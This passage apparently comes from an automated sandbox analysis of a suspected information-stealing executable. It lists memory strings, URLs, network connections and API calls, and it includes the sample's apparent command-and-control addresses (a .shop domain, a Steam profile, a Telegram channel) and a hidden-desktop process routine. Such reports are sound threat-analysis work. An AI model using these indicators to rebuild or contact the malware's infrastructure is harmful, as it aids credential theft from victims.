                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                  Source: 000003.log6.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
                  Source: chromecache_561.7.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
                  Source: ktyihkdfesf.exe, 00000000.00000003.2152897226.0000000000759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000075F000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2183336495.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000075F000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2183336495.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/0
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/N
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/U
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/Z
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000003.2183336495.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/n
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/p
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/ta
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/v
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/xg
                  Source: ktyihkdfesf.exe, 00000000.00000003.2502205979.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/~
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shop;
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shopQQ1V3Oming
                  Source: ktyihkdfesf.exe, 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://frostman.shopTRIE
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://gaana.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                  Source: 0HDJEU.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://m.kugou.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://m.soundcloud.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://m.vk.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                  Source: Cookies.15.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.15.drString found in binary or memory: https://msn.comXIDv10
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://music.amazon.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://music.apple.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://music.yandex.com
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 000003.log3.14.drString found in binary or memory: https://ntp.msn.com
                  Source: 000003.log9.14.dr, 000003.log0.14.drString found in binary or memory: https://ntp.msn.com/
                  Source: 000003.log9.14.drString found in binary or memory: https://ntp.msn.com/0
                  Source: QuotaManager.14.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 000003.log9.14.dr, 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: Session_13379149893822046.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: QuotaManager.14.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.14.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://open.spotify.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: chromecache_561.7.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://srtb.msn.com/
                  Source: ktyihkdfesf.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: ktyihkdfesf.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/9dB1
                  Source: ktyihkdfesf.exeString found in binary or memory: https://t.me/k04ael
                  Source: ktyihkdfesf.exeString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://tidal.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://vibe.naver.com/today
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                  Source: ktyihkdfesf.exe, 00000000.00000003.2152974492.0000000000765000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmp, ktyihkdfesf.exe, 00000000.00000002.2788484418.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.telegram.org/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://web.whatsapp.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.deezer.com/
                  Source: V37YCB.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: content_new.js.14.dr, content.js.14.drString found in binary or memory: https://www.google.com/chrome
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 6a82b066-0a0e-4bfa-8ca2-b2a13d05ddcf.tmp.15.dr, 173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drString found in binary or memory: https://www.googleapis.com
                  Source: chromecache_561.7.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
                  Source: chromecache_561.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
                  Source: chromecache_561.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.iheart.com/podcast/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.instagram.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.last.fm/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.messenger.com
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                  Source: ktyihkdfesf.exe, 00000000.00000002.2792537881.0000000003EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.office.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.tiktok.com/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://www.youtube.com
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://y.music.163.com/m/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                  Source: unknown; HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.6:49715 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49796 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49841 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49960 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50022 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50061 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50103 version: TLS 1.2
                  Source: unknown; HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50154 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_00407060 FindFirstFileA,strlen,FindFirstFileA,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060

                  System Summary

